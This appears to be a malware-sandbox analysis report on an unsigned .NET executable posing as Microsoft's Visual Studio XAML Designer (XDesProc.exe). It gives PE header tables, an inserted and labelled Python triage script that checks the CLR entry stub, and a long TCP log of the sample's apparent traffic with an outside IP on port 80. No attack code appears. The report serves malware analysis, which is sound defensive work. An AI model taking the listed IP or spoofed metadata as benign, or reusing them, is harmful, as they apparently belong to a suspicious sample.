                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
jmp dword ptr [00402000h] ; indirect jump through the IAT slot at RVA 0x2000, the mscoree.dll _CorExeMain import: the standard native stub of a .NET executable
add byte ptr [eax], al (repeated to the end of the preview window: 00 00 decodes as this instruction, so everything after the 6-byte stub is zero padding, not code)

                                                    Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1976c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0xc60 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

                                                    Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x177c4 | 0x17800 | False | 0.283764128989 | data | 5.63725978079 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x1a000 | 0xc60 | 0xe00 | False | 0.495535714286 | data | 4.81005147866 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

Name | RVA | Size | Type | Language | Country
IBC | 0x1a10c | 0x485 | data | - | -
RT_VERSION | 0x1a594 | 0x394 | data | English | United States
RT_MANIFEST | 0x1a928 | 0x331 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | English | United States

                                                    Imports

DLL | Import
mscoree.dll | _CorExeMain

                                                    Version Infos

Description | Data
LegalCopyright | Microsoft Corporation. All rights reserved.
InternalName | XDesProc.exe
FileVersion | 16.6.30114.105 built by: D16.6
CompanyName | Microsoft Corporation
ProductName | Microsoft Visual Studio
ProductVersion | 16.6.30114.105
FileDescription | Microsoft Visual Studio XAML Designer
OriginalFilename | XDesProc.exe
Translation | 0x0409 0x04b0
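The static data above tells a consistent story for a managed loader: a single import (mscoree.dll _CorExeMain), an IAT of 8 bytes at RVA 0x2000, a CLR header (COM descriptor) at 0x2008, an empty security directory (so the Microsoft version resource is not backed by an Authenticode signature), and an entry point that is one indirect jmp followed by zeros. The following is an added example, not code from the report or from the sample, of how a triage script checks those facts directly from the PE headers. The parser is hypothetical code; the PE it builds is constructed here to mirror the report's layout (ImageBase 0x400000, .text at RVA 0x2000, IAT at 0x2000 of size 8, CLR header at 0x2008 of size 0x48, no security directory) and is not the analysed file, and it generalises slightly by also rejecting a native prologue at the entry point.

```python
"""Added example (not part of the report): verify a PE32 file's native entry point
is the standard CLR launch stub.

A .NET executable's unmanaged entry point is a 6-byte `FF 25 <abs addr>`
(jmp dword ptr [addr]) through the first IAT slot, which the loader fills with
mscoree!_CorExeMain; the bytes after it are zero padding. The parser below is
hypothetical triage code; build_sample_pe() constructs a PE with the report's
directory layout and is not the real sample.
"""
import struct

# IMAGE_DIRECTORY_ENTRY_* indices from the PE specification
DIR_IMPORT, DIR_SECURITY, DIR_IAT, DIR_COM_DESCRIPTOR = 1, 4, 12, 14


def parse_pe32(data: bytes) -> dict:
    """Read entry point, image base, data directories and section table (PE32 only)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, rawptr, rawsize))
    return {"entry_rva": entry_rva, "image_base": image_base, "dirs": dirs, "sections": sections}


def rva_to_offset(pe: dict, rva: int):
    """Map an RVA to a file offset via the section table; returns (offset, section name)."""
    for name, va, vsize, rawptr, rawsize in pe["sections"]:
        if va <= rva < va + max(vsize, rawsize):
            return rawptr + (rva - va), name
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def check_clr_stub(data: bytes) -> dict:
    """Classify the entry point (managed launch stub or native code) and the signing state."""
    pe = parse_pe32(data)
    off, section = rva_to_offset(pe, pe["entry_rva"])
    stub = data[off:off + 6]
    iat_rva, _ = pe["dirs"][DIR_IAT]
    _, clr_size = pe["dirs"][DIR_COM_DESCRIPTOR]
    _, sig_size = pe["dirs"][DIR_SECURITY]
    is_jmp_indirect = stub[:2] == b"\xff\x25"
    # The absolute operand must point at the IAT slot the loader fills with _CorExeMain
    target = struct.unpack_from("<I", stub, 2)[0] if is_jmp_indirect else None
    jumps_via_iat = target == pe["image_base"] + iat_rva
    return {
        "entry_va": pe["image_base"] + pe["entry_rva"],
        "entry_section": section,
        "stub_hex": stub.hex(),
        "has_clr_header": clr_size != 0,
        "managed_stub": is_jmp_indirect and jumps_via_iat and clr_size != 0,
        "zero_padded": not any(data[off + 6:off + 0x40]),  # what a disassembler shows as add [eax], al
        "authenticode_signed": sig_size != 0,               # empty security directory => unsigned
    }


def build_sample_pe(entry_rva: int = 0x2100, stub: bytes = b"\xff\x25\x00\x20\x40\x00") -> bytes:
    """Constructed PE32 (not the real sample) with the report's directory layout."""
    image_base = 0x400000
    dirs = [(0, 0)] * 16
    dirs[DIR_IMPORT] = (0x2050, 0x4F)
    dirs[DIR_IAT] = (0x2000, 0x8)
    dirs[DIR_COM_DESCRIPTOR] = (0x2008, 0x48)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x80)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x6010A357, 0, 0, 0xE0, 0x0122)
    opt = struct.pack("<HBBIIIIIII", 0x10B, 48, 0, 0x400, 0x200, 0, entry_rva, 0x2000, 0x3000, image_base)
    opt += struct.pack("<IIHHHHHHIIIIHHIIIIII", 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0,
                       0x4000, 0x200, 0, 2, 0x8540, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x400, 0x2000, 0x400, 0x200, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x200, 0x3000, 0x200, 0x600, 0, 0, 0, 0, 0x40000040)
    headers = (dos.ljust(0x80, b"\0") + b"PE\0\0" + coff + opt + sec).ljust(0x200, b"\0")
    text = bytearray(0x400)
    text[8:12] = struct.pack("<I", 0x48)                       # IMAGE_COR20_HEADER.cb at RVA 0x2008
    text[entry_rva - 0x2000:entry_rva - 0x2000 + len(stub)] = stub
    return headers + bytes(text) + bytes(0x200)


if __name__ == "__main__":
    for key, value in check_clr_stub(build_sample_pe()).items():
        print(f"{key}: {value}")
```

On the real sample the same checks reproduce the report's findings: entry RVA 0x197be lands in .text, the operand 0x402000 equals ImageBase + the IAT RVA, the CLR header is present, and the security directory is empty, which is what makes the "Microsoft Visual Studio XAML Designer" version resource worthless as provenance.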

                                                    Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 27, 2021 15:15:04.075184107 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.124214888 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.124363899 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.125174999 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.173216105 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173243999 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173261881 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173279047 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173307896 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173325062 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173335075 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.173341036 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173357964 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173374891 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173397064 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.173409939 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.173429966 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.173460007 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.220325947 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220357895 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220374107 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220391035 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220407963 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220423937 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220443964 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220463991 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220479965 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220496893 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220514059 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220525026 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220539093 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220551014 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220555067 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.220563889 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220582962 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220599890 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220616102 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220632076 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
Jan 27, 2021 15:15:04.220634937 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220654011 CET | 80 | 49721 | 193.239.147.103 | 192.168.2.3
Jan 27, 2021 15:15:04.220669031 CET | 49721 | 80 | 192.168.2.3 | 193.239.147.103
                                                    Jan 27, 2021 15:15:04.220707893 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.268702030 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268733978 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268752098 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268769026 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268785954 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268798113 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.268801928 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268829107 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.268853903 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.268888950 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268919945 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268937111 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268953085 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268966913 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.268973112 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268991947 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.268992901 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269010067 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269026995 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269035101 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269043922 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269061089 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269077063 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269081116 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269094944 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269117117 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269119024 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269134998 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269143105 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269153118 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269170046 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269176960 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269193888 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269210100 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269216061 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269233942 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269251108 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269258022 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269273043 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269289970 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269294977 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269306898 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269324064 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269334078 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269340038 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269356966 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269365072 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269372940 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269406080 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269407988 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269427061 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269447088 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.269455910 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.269499063 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.316669941 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316696882 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316714048 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316730022 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316745043 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316759109 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316775084 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316790104 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316803932 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316822052 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316827059 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.316838980 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316855907 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.316891909 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.316926003 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317162037 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317182064 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317198038 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317213058 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317235947 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317262888 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317276955 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317280054 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317296028 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317311049 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317336082 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317339897 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317359924 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317362070 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317378044 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317408085 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317423105 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317428112 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317440033 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317460060 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317487955 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317500114 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317502022 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317518950 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317534924 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317552090 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317557096 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317569971 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317585945 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317596912 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317603111 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317620993 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317630053 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317641973 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317661047 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317666054 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317677021 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317686081 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317696095 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317713022 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317725897 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317728996 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317744970 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317761898 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317780018 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317781925 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317801952 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317806959 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317820072 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317836046 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317843914 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317853928 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.317873955 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.317909002 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.363903046 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.363929987 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.363950014 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.363967896 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.363984108 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364000082 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364017010 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364017010 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364032984 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364047050 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364058971 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364072084 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364077091 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364084959 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364098072 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364110947 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364126921 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364149094 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364181042 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364648104 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364696026 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364713907 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364727020 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364733934 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364753008 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364773035 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364773035 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364793062 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364803076 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364809990 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364828110 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364846945 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364854097 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364866018 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364878893 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364883900 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364903927 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364922047 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364931107 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364943027 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364959955 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364969969 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.364976883 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.364995003 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365003109 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.365011930 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365025997 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.365030050 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365046978 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365056992 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.365068913 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365087032 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365091085 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.365103960 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365120888 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365137100 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365145922 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.365154028 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365170002 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365176916 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.365187883 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365200043 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.365207911 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365226030 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.365236998 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.365241051 CET8049721193.239.147.103192.168.2.3
